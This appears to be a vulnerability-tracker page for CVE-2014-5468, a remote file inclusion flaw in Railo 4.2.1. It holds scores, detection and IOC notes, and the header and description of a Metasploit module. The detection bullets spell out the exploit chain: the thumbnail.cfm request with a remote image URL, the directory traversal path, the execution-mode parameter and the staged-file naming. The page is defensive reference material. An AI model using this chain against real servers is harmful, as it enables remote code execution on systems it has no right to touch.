CVE-2014-5468
published 2020-02-07CVE-2014-5468: A File Inclusion vulnerability exists in Railo 4.2.1 and earlier via a specially-crafted URL request to the thumbnail.cfm to specify a malicious PNG file…
PriorityP271high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
52.56%
98.8th percentile
A File Inclusion vulnerability exists in Railo 4.2.1 and earlier via a specially-crafted URL request to the thumbnail.cfm to specify a malicious PNG file, which could let a remote malicious user obtain sensitive information or execute arbitrary code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getrailo | railo | <= 4.2.1.000 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests to /railo-context/admin/thumbnail.cfm with an external 'img' parameter pointing to a remote URL, which indicates RFI exploitation attempt. ↗
- →Detect directory traversal in requests to img.cfm via the 'attributes.src' parameter containing '../../../../temp/admin-ext-thumbnails/' to identify second-stage payload execution. ↗
- →Alert on HTTP 500 responses from the Railo server following a GET to thumbnail.cfm with external img, height, and width parameters — the exploit expects a 500 to confirm successful staging. ↗
- →Detect the 'thistag.executionmode=start' query parameter in requests to img.cfm, which is a specific indicator of the directory-traversal/CFML execution step of this exploit chain. ↗
- →A PNG file served with embedded CFML markup (cold fusion markup appended to PNG) is used as the stager; inspect files written to temp/admin-ext-thumbnails/ for CFML content. ↗
- →Use the known MD5 of /res/images/id.png (6de48cb72421cfabdce440077a921b25) to fingerprint unpatched Railo 4.2.1 instances during scanning. ↗
- ·The default TARGETURI for the Metasploit module is '/railo-context/'; deployments with a non-default base URI will use a different path prefix, so detections should account for variable base paths. ↗
- ·The exploit requires SRVHOST to be a routable IP address reachable by the target server; exploitation will fail if the attacker host is not externally accessible, limiting attack surface to network-reachable scenarios. ↗
- ·The hash used to reference the staged file in temp/admin-ext-thumbnails/ is computed as MD5 of '<stager_url>-5000-5000' (width/height hardcoded to 5000), uppercased — detection rules should account for this naming pattern. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Railo 4.2.1 - Remote File Inclusion (Metasploit)
exploitdb·2014-09-15
CVE-2014-5468 Railo 4.2.1 - Remote File Inclusion (Metasploit)
Railo 4.2.1 - Remote File Inclusion (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Railo Remote File Include',
'Description' => '
This module exploits a remote file include vulnerability in Railo,
tested against version 4.2.1. First, a call using a vulnerable
line in thumbnail.cfm allows an atacker to download an
arbitrary PNG file. By appending a .cfm, and taking advantage of
a directory traversal, an attacker can append cold fusion markup
to the PNG file, and have it interpreted by the server. This is
used to stage and execute a fully-fledged payload.
',
'License' => MSF_LICENSE,
'Author' => [
'Bryan Alexander ', # Discovery/PoC
'bperry' # me
Metasploit
Railo Remote File Include
metasploit
Railo Remote File Include
Railo Remote File Include
This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable line in thumbnail.cfm allows an attacker to download an arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append cold fusion markup to the PNG file, and have it interpreted by the server. This is used to stage and execute a fully-fledged payload.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/128234/Railo-4.2.1-Remote-File-Inclusion.htmlhttp://www.exploit-db.com/exploits/34669https://exchange.xforce.ibmcloud.com/vulnerabilities/95959https://vulmon.com/vulnerabilitydetails?qid=CVE-2014-5468https://www.securityfocus.com/bid/69761http://packetstormsecurity.com/files/128234/Railo-4.2.1-Remote-File-Inclusion.htmlhttp://www.exploit-db.com/exploits/34669https://exchange.xforce.ibmcloud.com/vulnerabilities/95959https://vulmon.com/vulnerabilitydetails?qid=CVE-2014-5468https://www.securityfocus.com/bid/69761
2020-02-07
Published